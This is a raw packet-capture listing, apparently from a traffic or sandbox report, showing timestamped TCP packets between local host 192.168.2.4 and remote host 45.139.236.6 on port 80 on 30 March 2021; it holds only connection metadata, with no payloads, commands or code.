Mar 30, 2021 14:22:53.021603107 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021625996 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021625042 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.021650076 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021673918 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021678925 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.021697044 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021718979 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.021723032 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021749020 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021771908 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021779060 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.021796942 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021821022 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021828890 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.021843910 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021867037 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021872044 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.021889925 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021914005 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.021915913 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021941900 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021961927 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.021965027 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.021986961 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022007942 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022012949 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.022028923 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022053003 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022057056 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.022077084 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022105932 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022114038 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.022134066 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022154093 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.022161007 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022187948 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022216082 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022222042 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.022241116 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022265911 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022270918 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.022290945 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022314072 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.022320986 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022349119 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022367954 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.022372007 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022397041 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022420883 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022427082 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.022445917 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022470951 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022478104 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.022495031 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022531033 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.022535086 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022559881 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022579908 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.022584915 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022609949 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022634029 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022638083 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.022653103 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022674084 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022694111 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022717953 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.022735119 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.022780895 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.023426056 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.100255966 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100290060 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100312948 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100337982 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100363016 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100387096 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100409985 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100435019 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100457907 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100481033 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100500107 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100526094 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100553989 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100578070 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100584030 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.100599051 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100625992 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100656033 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100672007 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.100682020 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100708961 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100723982 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.100732088 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100754976 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100759983 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.100778103 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100801945 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100805998 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.100826979 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100857973 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.100873947 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100898981 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100903034 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.100922108 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100944996 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100950003 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.100967884 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.100995064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101020098 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101028919 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.101046085 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101069927 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101083040 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.101098061 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101120949 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.101123095 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101149082 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101155996 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.101175070 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101197958 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101208925 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.101218939 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101243019 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101267099 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101267099 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.101290941 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101301908 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.101316929 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101342916 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101353884 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.101365089 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101404905 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.101435900 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101460934 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101480007 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101497889 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101516962 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101540089 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101562977 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101566076 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.101583958 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101608038 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101629972 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.101634026 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101660967 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101665974 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.101685047 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101707935 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101727009 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.101732016 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101757050 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101783037 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.101783991 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101808071 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101809025 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.101835012 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101855993 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101876020 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101886034 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.101900101 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101922989 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101939917 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.101946115 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101969004 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.101970911 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.101991892 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.102018118 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.102019072 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.102041006 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.102051020 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.102066040 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.102099895 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.102309942 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.102370977 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.103588104 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.113025904 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113059044 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113082886 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113105059 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113128901 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113143921 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.113153934 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113178015 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113198996 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113199949 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.113223076 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113226891 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.113245964 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113248110 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.113270044 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113293886 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113301039 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.113317966 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113339901 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.113343000 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113365889 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113394976 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.113415956 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113446951 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113467932 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.113473892 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113496065 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113518000 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113528967 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.113540888 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113564968 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113573074 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.113588095 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113610029 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.113614082 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113640070 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113661051 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.113667965 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113692999 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113715887 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113715887 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.113743067 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113764048 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113766909 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.113785982 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113809109 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113815069 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.113831997 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113852978 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.113859892 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113884926 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113908052 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113913059 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.113933086 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113955975 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.113961935 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.113981009 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114006996 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114010096 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114031076 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114054918 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114057064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114083052 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114106894 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114108086 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114130974 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114150047 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114154100 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114178896 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114200115 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114209890 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114224911 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114250898 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114252090 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114279032 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114298105 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114303112 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114329100 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114350080 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114351034 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114378929 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114399910 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114401102 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114423990 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114450932 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114450932 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114476919 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114494085 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114500046 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114526987 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114547014 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114550114 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114569902 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114589930 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114608049 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114630938 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114633083 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114658117 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114669085 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114681005 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114682913 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114707947 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114727020 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114731073 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114754915 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114777088 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114778996 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114808083 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114833117 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114834070 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114859104 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114881992 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114888906 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114902973 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114926100 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114936113 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114948034 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114967108 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.114969969 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.114995003 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115016937 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115020037 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.115040064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115061998 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115077972 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.115091085 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115108013 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115140915 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115159035 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115176916 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115194082 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115217924 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115238905 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115238905 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.115256071 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.115267992 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115284920 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.115293026 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115317106 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115339041 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115346909 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.115361929 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115386009 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115394115 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.115411043 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115432978 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115448952 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.115462065 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115479946 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.115489006 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115510941 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115535021 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115535975 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.115560055 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115582943 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115582943 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.115607977 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115629911 CEST	80	49744	45.139.236.6	192.168.2.4
